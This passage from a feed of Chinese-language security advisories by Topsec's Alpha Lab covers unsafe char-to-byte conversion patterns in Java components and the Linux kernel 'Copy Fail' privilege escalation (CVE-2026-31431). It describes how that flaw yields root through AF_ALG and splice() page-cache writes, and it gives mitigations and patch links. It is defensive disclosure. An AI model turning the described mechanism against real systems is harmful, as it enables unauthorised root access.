62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span leaf=""><span textstyle="" style="font-size: 14px;">暂无</span></span></p><p style="margin-top: 24px;margin-bottom: 0px;letter-spacing: 0.578px;text-wrap: wrap;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;"><span leaf="">0x03 漏洞等级</span></span></strong><span leaf=""><br/></span></p><hr style="text-wrap: wrap;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span leaf="">高危</span></span></p><p style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x04 受影响版本</span></span></strong></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span leaf=""><span textstyle="" style="font-size: 14px;">所有存在以下高危代码写法的 Java 应用和组件：</span></span></p><p style="margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">1、(byte) ch - char 到 byte 的强制类型转换</span></span></p><p style="margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">2、ch &amp; 0xff / ch &amp; 255 / 0xff &amp; ch - 位运算截断</span></span></p><p style="margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">3、baos.write(ch) - 直接将 char 写入字节流</span></span></p><p style="margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">4、DataOutputStream.writeBytes(String s) - 按字节写入字符串</span></span></p><p style="margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">5、OutputStream.write(int) - 直接写入 int 值的低 8 位</span></span></p><p style="margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">6、StringBufferInputStream.read() - 字符流到字节流转换</span></span></p><p style="margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">7、String.getBytes(int, int, byte[], int) - 过时的字节获取方法</span></span></p><p style="margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">8、RandomAccessFile.writeBytes() - 按字节写入</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">9、URLDecoder.decode() - URL 解码相关处理</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">已知受影响的 Java 组件：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">Apache Tomcat、Spring Framework、Eclipse Jetty、Fastjson、Jackson、Openfire、Apache HttpClient、Angus Mail / Jakarta Mail、Jira、Confluence、GeoServer</span></span></p><p style="margin-top: 24px;margin-bottom: 0px;letter-spacing: 0.578px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;"><span leaf="">0x05 修复建议</span></span></strong></p><hr style="color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><p style="margin-top: 16px;margin-bottom: 0px;"><span style="font-size: 14px;"><span leaf="">1、临时缓解措施</span></span></p><p style="margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;"><p style="margin-top: 0px;margin-bottom: 0px;line-height: 1.75em;"><span leaf="">如果暂时无法完成代码修复和组件升级，可采取以下缓解措施：</span></p><p style="margin-top: 0px;line-height: 1.75em;"><span leaf="">（1）对用户输入进行严格的字符范围校验，拒绝包含高Unicode字符的关键输入字段（文件名、路径、邮箱地址、HTTP Header 等）。</span></p><p style="margin-top: 0px;margin-bottom: 16px;line-height: 1.75em;"><span leaf="">（2）若非必要，避免在互联网上暴露存在风险的 Java 应用服务。</span></p><p style="margin-bottom: 16px;"><span leaf="">2、代码修复</span></p><p style="line-height: 1.75em;"><span leaf="">（1）禁止隐式 char -&gt; byte 截断：避免使用(byte) ch等强制类型转换写法，改用显式的字符编码转换，如StandardCharsets.UTF_8.encode()。</span></p><p style="line-height: 1.75em;"><span leaf="">（2）统一校验与执行语义：先把输入还原成最终会被执行的字节语义，再进行安全校验，确保检查和执行在同一语义空间。</span></p><p style="line-height: 1.75em;"><span leaf="">（3）输入规范化：在输入校验阶段前对输入进行统一的编码规范化处理。</span></p><p style="line-height: 1.75em;"><span leaf="">（4）升级受影响组件：将受已知漏洞影响的 Java 组件按照官方安全公告升级至安全版本。</span></p></span></p><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x06 声明</span></span></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span leaf="">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。</span></p><div style="white-space: normal;margin-bottom: 0px;"><div style="margin: 30px 0% 10px;"><div style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><div style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;"><span leaf="">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span></span></p></div></div></div></div><div style="margin-bottom: 0px;"><div><div style="text-align: center;margin: 30px 0% 10px;"><div style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><div><div style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100013023" data-ratio="0.06041666666666667" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="png" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></div></div><div><div style="margin: 10px 0%;"><div style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><div><div style="margin-top: 10px;margin-bottom: 10px;"><p style="vertical-align: middle;display: inline-block;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100013022" data-ratio="1" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="jpeg" data-w="344" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: 61.8%;"><div><div><div style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;"><span leaf="">天融信</span></span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;"><span leaf="">阿尔法实验室</span></span></p></div></div></div><div><div style="margin: 10px 0%;"><div style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><div><div style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;"><span leaf="">长按二维码关注我们</span></span></p></div></div></div></div></div></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=2748a032&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496705%26idx%3D1%26sn%3Df6b76bcbd3beb393983e7cb3b4c0eea4">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 30 Apr 2026 18:12:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于Linux Kernel本地权限提升漏洞(CVE-2026-31431)的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496705&amp;idx=2&amp;sn=2f53fc8a4a3695c13f1ea7fc09bb1b9c</link>
      <description>4月30日，天融信阿尔法实验室监测到Linux Kernel修复了一个本地权限提升漏洞（CVE-2026-31431），其被称为Copy Fail。该漏洞利用复杂度较低，且影响过去9年内大多数主流Linux发行版，对云服务器、容器宿主机、多租户环境等构成较高风险。</description>
      <content:encoded><![CDATA[<p><span>天融信应急响应</span> <span>2026-04-30 18:12</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=60892a2f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FTWq54w4h0qSDwnL7UseCicciccIIIfpUTSx3BZzcPCUdIcQ04vQumtt9sm8l9icCmVHtWq6FT5zibib0VAhNfiaUXGQIYLJvhd9r3DdAEicgib7UdTc%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>4月30日，天融信阿尔法实验室监测到Linux Kernel修复了一个本地权限提升漏洞（CVE-2026-31431），其被称为Copy Fail。该漏洞利用复杂度较低，且影响过去9年内大多数主流Linux发行版，对云服务器、容器宿主机、多租户环境等构成较高风险。</p>
  <p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/H6W1QCHf9dHGTzEB1OhEu0PWb5DLcoKdib3G0a8cribUdnl1QUL8PLLpt4W4iaKsBAPDHwAW2zVDkv0ibQjW0lddlw/0?wx_fmt=png" data-cropx2="1280" data-cropy1="75.29411764705883" data-cropy2="593.4948096885813" data-imgfileid="100008572" data-ratio="0.4046875" data-s="300,640" type="block" data-type="png" data-w="1280" style="width:578px;height:234px;" src="https://wechat2rss.xlab.app/img-proxy/?k=e1895bcf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FTWq54w4h0qTBZVpuwzKeVuenmiaibp0IMYuziaGwSbeQZelG0Jefqtsw1AIpTLiaus50eJwta77F3va4FHvg4jsmxMS6lZa6FxgiaibIjdue335ok%2F640%3Fwx_fmt%3Djpeg"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x00 背景介绍</span></span></strong><span leaf=""><br/></span></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span style="font-size: 14px;"><span leaf="">4月30日</span><span style="font-size: 14px;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(53, 53, 53);font-family: \&#34;Helvetica Neue\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei\&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 14px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">，<span textstyle="" style="font-size: 14px;">天融信阿尔法实验室监测到Linux Kernel修复了一个本地权限提升漏洞（CVE-2026-31431），其被称为Copy Fail。该漏洞利用复杂度较低，且影响过去9年内大多数主流Linux发行版，对云服务器、容器宿主机、多租户环境等构成较高风险。此漏洞的PoC和细节已公开，由于此漏洞影响范围极广，建议受影响用户立即修复该漏洞。</span></span></span></span></p><p style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x01 漏洞描述</span></span></strong></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Linux内核是一个开源、宏内核但支持动态模块加载的操作系统核心，负责管理硬件资源并为上层软件提供运行环境。它通过进程调度、内存管理、虚拟文件系统、网络协议栈和设备驱动等关键子系统，实现对CPU、内存、磁盘及外设的抽象与调度，并提供稳定、安全和高效的接口供应用程序使用。凭借高可移植性、丰富的驱动支持和强大的社区协作，其已成为从嵌入式设备到超级计算机、从安卓系统到云服务器广泛采用的基础核心。</span></span></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">CVE-2026-31431是Linux Kernel加密子系统中的一个逻辑缺陷漏洞，可导致本地权限提升。经过身份认证的本地低权限攻击者可利用AF_ALG加密接口与splice()系统调用的组合，向任意可读文件的页缓存写入受控的4字节数据，从而篡改setuid程序，无需条件竞争即可直接获得root权限。</span></span></p><p data-pm-slice="0 0 []" style="margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14pt;"><span leaf=""><span textstyle="" style="font-size: 14px;">漏洞复现（复现环境</span></span><span lang="EN-US"><span leaf=""><span textstyle="" style="font-size: 14px;">Ubuntu 22.04.4 LTS</span></span></span><span leaf=""><span textstyle="" style="font-size: 14px;">）</span></span><span lang="EN-US"><span leaf=""><span textstyle="" style="font-size: 14px;">:</span></span></span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.15446071904127828" data-s="300,640" data-type="png" data-w="751" type="block" data-imgfileid="100013049" src="https://wechat2rss.xlab.app/img-proxy/?k=f0e82f57&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FTWq54w4h0qQIg9I6hCyTbZJ6KrSBSRpe1Ehl8x71WqTp0MibA0y0fUricwqnLY8zjHtY42vDbicH3iaZ0HIB5BmmBicNEKXlNEq1JOpC1NvHF6a4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x02 漏洞编号</span></span></strong></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span leaf="">CVE-2026-31431</span></span></p><p style="margin-top: 24px;margin-bottom: 0px;letter-spacing: 0.578px;text-wrap: wrap;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;"><span leaf="">0x03 漏洞等级</span></span></strong><span leaf=""><br/></span></p><hr style="text-wrap: wrap;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span leaf="">高危</span></span></p><p style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x04 受影响版本</span></span></strong></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 16px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span leaf="">72548b093ee3 &lt;= Linux Kernel commit &lt; a664bf3d603d</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">已知受影响的发行版：</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Ubuntu 22.04 LTS</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Ubuntu 24.04 LTS</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Ubuntu 26.04 LTS</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Amazon Linux 2023</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Red Hat Enterprise Linux 10</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Red Hat Enterprise Linux 9</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Red Hat Enterprise Linux 8</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">SUSE 16</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Kali Linux 2026.1</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Debian 13</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Linux Mint 22.3</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Manjaro 26.0.4</span></span></p><p style="margin-top: 24px;margin-bottom: 0px;letter-spacing: 0.578px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;"><span leaf="">0x05 修复建议</span></span></strong></p><hr style="color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><p style="margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;"><span leaf="">1、临时缓解措施</span></span></p><p style="margin-top: 0px;margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">如果暂时无法升级，可禁用 algif_aead 内核模块：</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">echo &#34;install algif_aead /bin/false&#34; &gt; /etc/modprobe.d/disable-algif-aead.conf</span></span></p><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">rmmod algif_aead 2&gt;/dev/null || true</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">2、升级修复</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">官方已发布漏洞补丁及修复版本，请评估业务是否受影响后，升级至安全版本。</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Linux Kernel 6.18: 升级至 6.18.22 或更高版本</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://git.kernel.org/stable/c/fafe0fa2995a0f7073c1c358d7d3145bcc9aedd8" target="_blank">https://git.kernel.org/stable/c/fafe0fa2995a0f7073c1c358d7d3145bcc9aedd8</a></span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Linux Kernel 6.19: 升级至 6.19.12 或更高版本</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://git.kernel.org/stable/c/ce42ee423e58dffa5ec03524054c9d8bfd4f6237" target="_blank">https://git.kernel.org/stable/c/ce42ee423e58dffa5ec03524054c9d8bfd4f6237</a></span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Linux Kernel 7.0: 升级至 7.0 (或应用相关补丁)</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://git.kernel.org/stable/c/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5" target="_blank">https://git.kernel.org/stable/c/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5</a></span></span></p><p style="margin-top: 0px;margin-bottom: 16px;"><span leaf=""><span textstyle="" style="font-size: 14px;">旧版本内核：请应用官方 Commit a664bf3d603d (Revert to operating out-of-place)。</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">针对 Ubuntu、Red Hat Enterprise Linux 等用户，发行版官方暂未全部发布安全更新，请及时关注官方安全公告：</span></span></p><p style="margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Ubuntu 安全公告：</span></span></p><p style="margin-bottom: 